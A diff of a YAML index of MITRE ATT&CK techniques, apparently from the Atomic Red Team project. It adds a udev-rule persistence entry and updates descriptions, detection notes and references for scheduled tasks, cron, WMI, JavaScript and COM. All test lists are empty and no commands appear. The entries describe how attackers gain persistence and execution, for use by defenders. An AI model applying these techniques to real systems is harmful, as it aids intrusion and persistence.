+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -24222,7 +24543,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24246,12 +24567,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24335,11 +24655,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24391,9 +24710,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24442,7 +24760,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24480,30 +24798,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24550,7 +24867,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24582,8 +24899,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24597,6 +24914,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24609,16 +24930,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24684,7 +25008,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -24761,66 +25084,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24833,31 +25101,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -24915,9 +25235,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -25009,20 +25328,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -25050,7 +25368,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -25070,33 +25388,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25113,6 +25411,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -25123,9 +25422,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -25133,8 +25436,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -25174,7 +25493,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -25199,12 +25518,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25284,11 +25601,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25348,12 +25664,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25451,9 +25766,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25470,19 +25785,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
